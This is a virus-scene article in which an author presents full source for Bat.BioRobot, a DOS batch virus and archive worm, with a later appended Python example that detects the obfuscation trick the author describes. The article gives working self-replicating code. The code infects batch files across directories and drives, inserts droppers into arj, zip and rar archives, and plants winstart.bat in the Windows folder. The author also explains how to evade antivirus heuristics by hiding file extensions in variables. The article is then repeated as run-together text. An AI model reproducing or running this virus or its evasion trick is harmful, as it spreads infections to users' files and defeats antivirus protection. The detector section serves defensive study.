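Strange Article - Bat.BioRobot by NeKr0

Don't kick me! It's my ooold virus, from when I was interested in batch :) It's a pretty simple virus/archive worm (it was written in the old DOS times and used the archivers from the path for worming). And it uses one anti-heuristic trick. Bastard AVs scream if they see a string like "for %%a in (*.bat) do ...". But if you set variable=bat or *.bat and write "for %%a in (*.%variable%)", the AV just shuts up :)

Work:
Tries to add a dropper to arj, rar & zip archives.
Infects bat files in the path, the current dir, the parent dir and on the c: d: e: disks.
Adds a dropper to the %windir% folder as winstart.bat.

========= There is Bat.BioRobot
@ctty nul%BR1%
if '%1'=='BR1DiR' goto BR1diRz
if '%1'=='BR1' goto BR1zex
set BR1FK=bat
echo.>BR1.bat
Find "BR1"<%0>>BR1.bat
for %%a in (*.arj ..\*.arj) do arj a %%a BR1.bat
for %%a in (*.zip ..\*.zip) do pkzip %%a BR1.bat
for %%a in (*.rar ..\*.rar) do rar a %%a BR1.bat
for %%r in (%path% . .. c: d: e:) do call BR1.bat BR1DiR %%r
goto BR1pre
:BR1DiRz
for %%c in (%2\*.%BR1FK%) do if not %%c==%2\AUTOEXEC.BAT call BR1.bat BR1 %%c
goto BR1end
:BR1pre
type BR1.bat >%windir%\winstart.bat
del BR1.bat
goto BR1end
:BR1zex
Find "BR1"<%2>nul
if errorlevel 1 type BR1.bat>>%2
:BR1end [StRANGER.Bi0R0b0t NeKr0!]
================ There is no Bat.BioRobot :p

P.S.: You may not use batch, but you MUST know batch :p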
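Added example, not part of the original article or its author's code: a small Python check showing why matching the literal loop string misses the variable form described above, and how resolving earlier `set` assignments before matching closes that gap. The function names and the sample script are constructed for illustration; the scan is linear and assumes no `goto`, `call` or delayed expansion.

```python
import re

# Constructed, harmless sample: every loop body only echoes the file name.
SAMPLE = r"""@echo off
set EXT=bat
set GLOB=*.bat
for %%f in (*.%EXT%) do echo %%f
for %%f in (%GLOB% ..\%GLOB%) do echo %%f
for %%f in (*.txt) do echo %%f
for %%f in (*.bat) do echo %%f
"""

SET_RE = re.compile(r'^\s*@?set\s+([^=\s]+)=(.*)$', re.I)
VAR_RE = re.compile(r'%([A-Za-z_]\w*)%')            # %NAME%, not %1 or %%a
FOR_RE = re.compile(r'\bfor\s+%%?\w\s+in\s*\(([^)]*)\)\s*do\b', re.I)
BAT_GLOB_RE = re.compile(r'\*\.(?:bat|cmd)\b', re.I)


def expand(line, env):
    """Substitute %NAME% from earlier `set` lines; unknown names stay as written."""
    for _ in range(5):                               # bounded, values may nest
        new = VAR_RE.sub(lambda m: env.get(m.group(1).upper(), m.group(0)), line)
        if new == line:
            break
        line = new
    return line


def scan(script, resolve=True):
    """Return (line_no, via_variable, effective_line) for loops over batch files.

    resolve=False is plain literal matching, the behaviour the article says
    the scanners of the time had.
    """
    env, hits = {}, []
    for n, raw in enumerate(script.splitlines(), 1):
        line = expand(raw, env) if resolve else raw
        m = SET_RE.match(line)
        if m:                                        # remember the assignment
            env[m.group(1).upper()] = m.group(2).strip()
            continue
        for loop in FOR_RE.finditer(line):
            if BAT_GLOB_RE.search(loop.group(1)):
                hits.append((n, line != raw, line.strip()))
    return hits


if __name__ == "__main__":
    print("literal :", [h[0] for h in scan(SAMPLE, resolve=False)])
    print("resolved:", [h[0] for h in scan(SAMPLE)])
```

The `via_variable` flag marks loops whose batch-file glob only appears after substitution, which is a stronger signal than the literal form because ordinary maintenance scripts rarely hide the extension behind a variable.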
Dont kick me! Its my ooold virus, when i was interested in batch :) Its a pretty simple virus/archive-worm (he was written in old dos times and useed for worming archvators from path). And it uses one antiheuristic trick. Bastard AV scream if they see a string like "for %%a in (*.bat) do ..." . But if you set variable=bat or *.bat and write "for %%a in (*.%variable%)" AV just shuts up :) . Work: Trying to add dropper in arj, rar & zip archives. Infects bat files in path, current dir, updir and c: d: e: disks Adds dropper in %windir% folder as winstart.bat ========= There is Bat.BioRobot @ctty nul%BR1% if '%1'=='BR1DiR' goto BR1diRz if '%1'=='BR1' goto BR1zex set BR1FK=bat echo.>BR1.bat Find "BR1"<%0>>BR1.bat for %%a in (*.arj ..\*.arj) do arj a %%a BR1.bat for %%a in (*.zip ..\*.zip) do pkzip %%a BR1.bat for %%a in (*.rar ..\*.rar) do rar a %%a BR1.bat for %%r in (%path% . .. c: d: e:) do call BR1.bat BR1DiR %%r goto BR1pre :BR1DiRz for %%c in (%2\*.%BR1FK%) do if not %%c==%2\AUTOEXEC.BAT call BR1.bat BR1 %%c goto BR1end :BR1pre type BR1.bat >%windir%\winstart.bat del BR1.bat goto BR1end :BR1zex Find "BR1"<%2>nul if errorlevel 1 type BR1.bat>>%2 :BR1end [StRANGER.Bi0R0b0t NeKr0!] ================ There is no Bat.BioRobot :p P.S.: You may not use batch, but you MUST know batch :p